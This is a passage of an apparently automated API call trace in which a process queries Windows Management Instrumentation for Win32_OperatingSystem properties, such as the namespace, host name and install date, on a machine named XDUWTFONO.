	[0220.322] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__GENUS", lFlags=0, pVal=0x1c68cc30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cc2c*=0, plFlavor=0x1c68cc28*=0 | out: pVal=0x1c68cc30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68cc2c*=3, plFlavor=0x1c68cc28*=64) returned 0x0
	[0220.323] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__PATH", lFlags=0, pVal=0x1c68cbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbcc*=0, plFlavor=0x1c68cbc8*=0 | out: pVal=0x1c68cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68cbcc*=8, plFlavor=0x1c68cbc8*=64) returned 0x0
	[0220.323] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x3f
	[0220.323] CoGetObjectContext (in: riid=0x1c68cb68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb60 | out: ppv=0x1c68cb60*=0x221868) returned 0x0
	[0220.323] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cb80 | out: pAptType=0x1c68cb80*=1) returned 0x0
	[0220.323] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cc88 | out: ppvObject=0x1c68cc88*=0x0) returned 0x80004002
	[0220.323] IUnknown:Release (This=0x221868) returned 0x1
	[0220.324] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c1f0 | out: ppv=0x1c68c1f0*=0x1cc3e160) returned 0x0
	[0220.324] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3e160, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf00 | out: ppvObject=0x1c68bf00*=0x0) returned 0x80004002
	[0220.324] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc3e160, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bee8 | out: ppvObject=0x1c68bee8*=0x1cc40820) returned 0x0
	[0220.324] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc40820, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bdf0 | out: ppvObject=0x1c68bdf0*=0x1cc40820) returned 0x0
	[0220.324] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc40820, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68be70 | out: ppvObject=0x1c68be70*=0x0) returned 0x80004002
	[0220.325] WbemDefPath:IUnknown:AddRef (This=0x1cc40820) returned 0x3
	[0220.325] CoGetContextToken (in: pToken=0x1c68bac0 | out: pToken=0x1c68bac0) returned 0x0
	[0220.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc40820, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68ba80 | out: ppvObject=0x1c68ba80*=0x1b893950) returned 0x0
	[0220.325] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b893950, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bab0 | out: pCid=0x1c68bab0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.325] WbemDefPath:IUnknown:Release (This=0x1b893950) returned 0x3
	[0220.325] CoGetContextToken (in: pToken=0x1c68ba90 | out: pToken=0x1c68ba90) returned 0x0
	[0220.325] WbemDefPath:IUnknown:AddRef (This=0x1cc40820) returned 0x4
	[0220.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc40820, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bba8 | out: ppvObject=0x1c68bba8*=0x0) returned 0x80004002
	[0220.326] WbemDefPath:IUnknown:Release (This=0x1cc40820) returned 0x3
	[0220.326] WbemDefPath:IUnknown:Release (This=0x1cc40820) returned 0x2
	[0220.326] WbemDefPath:IUnknown:Release (This=0x1cc3e160) returned 0x0
	[0220.326] WbemDefPath:IUnknown:Release (This=0x1cc40820) returned 0x1
	[0220.326] CoGetContextToken (in: pToken=0x1c68c7c0 | out: pToken=0x1c68c7c0) returned 0x0
	[0220.326] CoGetContextToken (in: pToken=0x1c68c700 | out: pToken=0x1c68c700) returned 0x0
	[0220.326] WbemDefPath:IUnknown:AddRef (This=0x1cc40820) returned 0x2
	[0220.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc40820, riid=0x1c68c840*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c820 | out: ppvObject=0x1c68c820*=0x1cc40820) returned 0x0
	[0220.327] WbemDefPath:IUnknown:Release (This=0x1cc40820) returned 0x2
	[0220.327] WbemDefPath:IUnknown:Release (This=0x1cc40820) returned 0x1
	[0220.327] CoGetContextToken (in: pToken=0x1c68c940 | out: pToken=0x1c68c940) returned 0x0
	[0220.327] CoGetContextToken (in: pToken=0x1c68c880 | out: pToken=0x1c68c880) returned 0x0
	[0220.327] WbemDefPath:IUnknown:AddRef (This=0x1cc40820) returned 0x2
	[0220.327] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc40820, riid=0x1c68c9c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9a0 | out: ppvObject=0x1c68c9a0*=0x1cc40820) returned 0x0
	[0220.327] WbemDefPath:IUnknown:Release (This=0x1cc40820) returned 0x2
	[0220.327] WbemDefPath:IUnknown:AddRef (This=0x1cc40820) returned 0x3
	[0220.327] WbemDefPath:IWbemPath:SetText (This=0x1cc40820, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x0
	[0220.327] WbemDefPath:IUnknown:Release (This=0x1cc40820) returned 0x2
	[0220.328] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc360a0, puCount=0x1c68cc00 | out: puCount=0x1c68cc00*=0x2) returned 0x0
	[0220.328] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cc00*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc00*=0x17, pszText=0x0) returned 0x0
	[0220.328] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cc00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.328] CoTaskMemAlloc (cb=0x8) returned 0x1b867740
	[0220.328] IEnumWbemClassObject:Next (in: This=0x1cc381d8, lTimeout=-1, uCount=0x1, apObjects=0x1b867740, puReturned=0x1c68ccb8 | out: apObjects=0x1b867740*=0x0, puReturned=0x1c68ccb8*=0x0) returned 0x1
	[0220.448] CoTaskMemFree (pv=0x1b867740) 
	[0220.448] CoGetContextToken (in: pToken=0x1c68ca40 | out: pToken=0x1c68ca40) returned 0x0
	[0220.449] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x1
	[0220.449] IUnknown:Release (This=0x1cc381d8) returned 0x0
	[0220.585] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc360a0, puCount=0x1c68cbc0 | out: puCount=0x1c68cbc0*=0x2) returned 0x0
	[0220.585] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cbc0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cbc0*=0x17, pszText=0x0) returned 0x0
	[0220.585] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cbc0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cbc0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.585] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cbb0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbac*=0, plFlavor=0x1c68cba8*=0 | out: pVal=0x1c68cbb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cbac*=8, plFlavor=0x1c68cba8*=64) returned 0x0
	[0220.585] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0220.585] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cbc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbbc*=8, plFlavor=0x1c68cbb8*=64 | out: pVal=0x1c68cbc0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cbbc*=8, plFlavor=0x1c68cbb8*=64) returned 0x0
	[0220.585] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0220.585] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc360a0, puCount=0x1c68cbc0 | out: puCount=0x1c68cbc0*=0x2) returned 0x0
	[0220.585] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cbc0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cbc0*=0x17, pszText=0x0) returned 0x0
	[0220.586] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cbc0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cbc0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.586] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__CLASS", lFlags=0, pVal=0x1c68cbb0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbac*=0, plFlavor=0x1c68cba8*=0 | out: pVal=0x1c68cbb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c68cbac*=8, plFlavor=0x1c68cba8*=64) returned 0x0
	[0220.586] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0220.586] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__CLASS", lFlags=0, pVal=0x1c68cbc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbbc*=8, plFlavor=0x1c68cbb8*=64 | out: pVal=0x1c68cbc0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c68cbbc*=8, plFlavor=0x1c68cbb8*=64) returned 0x0
	[0220.586] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0220.586] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc360a0, puCount=0x1c68cb50 | out: puCount=0x1c68cb50*=0x2) returned 0x0
	[0220.586] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cb50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cb50*=0x17, pszText=0x0) returned 0x0
	[0220.587] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cb50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cb50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.587] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc360a0, puCount=0x1c68cb50 | out: puCount=0x1c68cb50*=0x2) returned 0x0
	[0220.587] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cb50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cb50*=0x17, pszText=0x0) returned 0x0
	[0220.587] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cb50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cb50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.587] IWbemClassObject:GetNames (in: This=0x1cc3e8d0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c68cb48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c68cb40 | out: pNames=0x1c68cb40*="\x01ƀ\x08") returned 0x0
	[0220.587] SafeArrayGetDim (psa=0x1b88af90) returned 0x1
	[0220.587] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__GENUS", lFlags=0, pVal=0x1c68cb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=0, plFlavor=0x1c68cb38*=0 | out: pVal=0x1c68cb40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68cb3c*=3, plFlavor=0x1c68cb38*=64) returned 0x0
	[0220.588] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__CLASS", lFlags=0, pVal=0x1c68cb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=0, plFlavor=0x1c68cb38*=0 | out: pVal=0x1c68cb40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c68cb3c*=8, plFlavor=0x1c68cb38*=64) returned 0x0
	[0220.588] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0220.588] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c68cb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=0, plFlavor=0x1c68cb38*=0 | out: pVal=0x1c68cb40*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=8, plFlavor=0x1c68cb38*=64) returned 0x0
	[0220.588] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__DYNASTY", lFlags=0, pVal=0x1c68cb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=0, plFlavor=0x1c68cb38*=0 | out: pVal=0x1c68cb40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c68cb3c*=8, plFlavor=0x1c68cb38*=64) returned 0x0
	[0220.588] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0220.588] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__RELPATH", lFlags=0, pVal=0x1c68cb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=0, plFlavor=0x1c68cb38*=0 | out: pVal=0x1c68cb40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68cb3c*=8, plFlavor=0x1c68cb38*=64) returned 0x0
	[0220.588] SysStringLen (param_1="Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x28
	[0220.589] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c68cb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=0, plFlavor=0x1c68cb38*=0 | out: pVal=0x1c68cb40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3f, varVal2=0x0), pType=0x1c68cb3c*=3, plFlavor=0x1c68cb38*=64) returned 0x0
	[0220.589] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__DERIVATION", lFlags=0, pVal=0x1c68cb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=0, plFlavor=0x1c68cb38*=0 | out: pVal=0x1c68cb40*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b88af90*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b867730, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c68cb3c*=8200, plFlavor=0x1c68cb38*=64) returned 0x0
	[0220.589] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__SERVER", lFlags=0, pVal=0x1c68cb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=0, plFlavor=0x1c68cb38*=0 | out: pVal=0x1c68cb40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c68cb3c*=8, plFlavor=0x1c68cb38*=64) returned 0x0
	[0220.589] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0220.589] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=0, plFlavor=0x1c68cb38*=0 | out: pVal=0x1c68cb40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cb3c*=8, plFlavor=0x1c68cb38*=64) returned 0x0
	[0220.589] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0220.590] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="__PATH", lFlags=0, pVal=0x1c68cb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cb3c*=0, plFlavor=0x1c68cb38*=0 | out: pVal=0x1c68cb40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68cb3c*=8, plFlavor=0x1c68cb38*=64) returned 0x0
	[0220.590] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x3f
	[0220.590] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc360a0, puCount=0x1c68cbe0 | out: puCount=0x1c68cbe0*=0x2) returned 0x0
	[0220.590] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cbe0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cbe0*=0x17, pszText=0x0) returned 0x0
	[0220.590] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cbe0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cbe0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.590] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="InstallDate", lFlags=0, pVal=0x1c68cbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbcc*=0, plFlavor=0x1c68cbc8*=0 | out: pVal=0x1c68cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="20171001131325.000000+600", varVal2=0x0), pType=0x1c68cbcc*=101, plFlavor=0x1c68cbc8*=32) returned 0x0
	[0220.590] SysStringLen (param_1="20171001131325.000000+600") returned 0x19
	[0220.590] IWbemClassObject:Get (in: This=0x1cc3e8d0, wszName="InstallDate", lFlags=0, pVal=0x1c68ce00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cdfc*=101, plFlavor=0x1c68cdf8*=32 | out: pVal=0x1c68ce00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="20171001131325.000000+600", varVal2=0x0), pType=0x1c68cdfc*=101, plFlavor=0x1c68cdf8*=32) returned 0x0
	[0220.590] SysStringLen (param_1="20171001131325.000000+600") returned 0x19
	[0221.700] CoGetObjectContext (in: riid=0x1c68cbb8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cbb0 | out: ppv=0x1c68cbb0*=0x221868) returned 0x0
	[0221.701] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cbd0 | out: pAptType=0x1c68cbd0*=1) returned 0x0
	[0221.701] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68ccd8 | out: ppvObject=0x1c68ccd8*=0x0) returned 0x80004002
	[0221.701] IUnknown:Release (This=0x221868) returned 0x1
	[0221.701] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c240 | out: ppv=0x1c68c240*=0x1cc3e240) returned 0x0
	[0221.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3e240, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf50 | out: ppvObject=0x1c68bf50*=0x0) returned 0x80004002
	[0221.702] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc3e240, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf38 | out: ppvObject=0x1c68bf38*=0x1cc380f0) returned 0x0
	[0221.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc380f0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68be40 | out: ppvObject=0x1c68be40*=0x1cc380f0) returned 0x0
	[0221.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc380f0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68bec0 | out: ppvObject=0x1c68bec0*=0x0) returned 0x80004002
	[0221.702] WbemDefPath:IUnknown:AddRef (This=0x1cc380f0) returned 0x3
	[0221.702] CoGetContextToken (in: pToken=0x1c68bb10 | out: pToken=0x1c68bb10) returned 0x0
	[0221.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc380f0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bad0 | out: ppvObject=0x1c68bad0*=0x1b893ab0) returned 0x0
	[0221.702] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b893ab0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bb00 | out: pCid=0x1c68bb00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0221.703] WbemDefPath:IUnknown:Release (This=0x1b893ab0) returned 0x3
	[0221.703] CoGetContextToken (in: pToken=0x1c68bae0 | out: pToken=0x1c68bae0) returned 0x0
	[0221.703] WbemDefPath:IUnknown:AddRef (This=0x1cc380f0) returned 0x4
	[0221.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc380f0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bbf8 | out: ppvObject=0x1c68bbf8*=0x0) returned 0x80004002
	[0221.703] WbemDefPath:IUnknown:Release (This=0x1cc380f0) returned 0x3
	[0221.703] WbemDefPath:IUnknown:Release (This=0x1cc380f0) returned 0x2
	[0221.703] WbemDefPath:IUnknown:Release (This=0x1cc3e240) returned 0x0
	[0221.703] WbemDefPath:IUnknown:Release (This=0x1cc380f0) returned 0x1
	[0221.703] CoGetContextToken (in: pToken=0x1c68c810 | out: pToken=0x1c68c810) returned 0x0
	[0221.703] CoGetContextToken (in: pToken=0x1c68c750 | out: pToken=0x1c68c750) returned 0x0
	[0221.703] WbemDefPath:IUnknown:AddRef (This=0x1cc380f0) returned 0x2
